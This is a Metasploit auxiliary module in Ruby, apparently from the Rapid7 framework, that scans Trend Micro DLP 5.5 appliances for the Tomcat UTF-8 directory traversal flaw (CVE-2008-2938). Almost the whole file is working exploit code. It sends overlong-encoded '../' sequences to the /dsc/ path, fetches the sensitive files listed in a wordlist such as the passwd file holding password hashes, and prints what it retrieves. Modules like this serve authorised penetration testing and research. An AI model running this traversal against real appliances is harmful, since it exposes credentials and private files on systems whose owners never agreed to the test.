##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'TrendMicro Data Loss Prevention 5.5 Directory Traversal',
      'Description'    => %q{
        This module tests whether a directory traversal vulnerablity is present
        in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.
        The vulnerability appears to be actually caused by the Tomcat UTF-8
        bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.
        This module simply tests for the same bug with Trend Micro specific settings.
        Note that in the Trend Micro appliance, /etc/shadow is not used and therefore
        password hashes are stored and anonymously accessible in the passwd file.
        },
      'References'     =>
        [
          [ 'URL', 'http://tomcat.apache.org/' ],
          [ 'OSVDB', '47464' ],
          [ 'OSVDB', '73447' ],
          [ 'CVE', '2008-2938' ],
          [ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
          [ 'EDB', '17388' ],
          [ 'BID', '48225' ],
        ],
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Jan 9 2009'
    )

    register_options(
      [
        Opt::RPORT(8443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line",
        File.join(Msf::Config.data_directory, "wordlists", "sensitive_files.txt") ]),
      ])
  end

  def extract_words(wordfile)
    return [] unless wordfile && File.readable?(wordfile)
    begin
      words = File.open(wordfile, "rb") do |f|
        f.read
      end
    rescue
      return []
    end
    save_array = words.split(/\r?\n/)
    return save_array
  end

  def find_files(files)
    traversal = '/%c0%ae%c0%ae'

    res = send_request_raw(
      {
        'method'  => 'GET',
        'uri'     => '/dsc/' + traversal*10 + files, # We know depth is 10
        }, 25)
    if (res and res.code == 200)
      print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
      @files_found << files
    elsif (res and res.code)
      vprint_status("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
    end
  end

  def run_host(ip)
    @files_found = []

    begin
      print_status("Attempting to connect to #{rhost}:#{rport}")
      res = send_request_raw(
        {
          'method'  => 'GET',
          'uri'     => '/dsc/',
        }, 25)

      if (res)
        extract_words(datastore['SENSITIVE_FILES']).each do |files|
          find_files(files) unless files.empty?
        end
      end

      if not @files_found.empty?
        print_good("File(s) found:")

        @files_found.each do |f|
          print_good(f)
        end
      else
        print_good("No File(s) found")
      end

    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::Timeout::Error, ::Errno::EPIPE
    end
  end
end